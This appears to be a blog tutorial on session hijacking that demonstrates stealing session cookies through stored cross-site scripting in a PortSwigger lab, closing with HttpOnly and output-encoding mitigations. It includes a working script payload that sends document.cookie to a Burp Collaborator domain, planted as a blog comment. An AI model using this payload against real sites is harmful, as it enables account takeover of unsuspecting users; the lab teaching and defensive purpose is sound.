Session Hijacking – Stealing Session IDs

Session hijacking is an attack in which an attacker steals the session IDs of application users. Attackers exploit different vulnerabilities to obtain these IDs; in this writeup I demonstrate how an attacker can do so using a cross-site scripting vulnerability.

Let’s first look at what a session ID is. In a web application the session ID plays a very important role: it lets the user perform authorized actions on the application without sending the user ID and password to the server in every HTTP request. The login page lets the user submit credentials to the application server in an HTTP request. The application server validates the credentials, generates a session ID and assigns it to the user. The server sends this session ID to the browser in the HTTP response (via the Set-Cookie header) and the browser stores it as a cookie.

You might be wondering what cross-site scripting is. Cross-site scripting is a vulnerability in which the application fails to validate malicious JavaScript received through user input and sends it back to the browser. The browser executes these malicious scripts, which end up performing malicious actions on the application.

Why it is necessary to protect session IDs: these IDs authorize actions on the application on behalf of users, so they are very sensitive and need to be protected.

Impact of session hijacking: an attacker can use the victim’s session ID to perform unauthorized actions on the victim’s behalf, causing large financial loss and damage to brand image.

How an attacker can steal a session ID using cross-site scripting: an attacker can inject a malicious script capable of extracting the session ID from the browser and sending it to a server the attacker controls.

For the demonstration I have used the items below:

  • Target web application: PortSwigger lab
  • Attacker server: Burp Suite Collaborator (attackers might use their own servers)
  • Malicious JavaScript: the script shown below

Attacker’s end:

Start Collaborator and copy the domain name.

Create a malicious script containing the domain name of the Collaborator server.

<script>
fetch('https://gk4ll8o8okdtj3puq3l91kgqshy8myan.oastify.com', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

The attacker accesses the application and comments on the blog with the malicious JavaScript payload.

Now the attacker needs to wait for victims to open the blog.

Victim’s end:

Once the victim logs into his account and visits the blog, the malicious script executes and the session ID is sent to the Collaborator server.

The attacker clicks “Poll now” and the session ID is received at Collaborator.

Mitigation:

  • Set the HttpOnly flag on the session cookie in the Set-Cookie header.
  • Perform HTML/output encoding before reflecting user-submitted input in the HTTP response.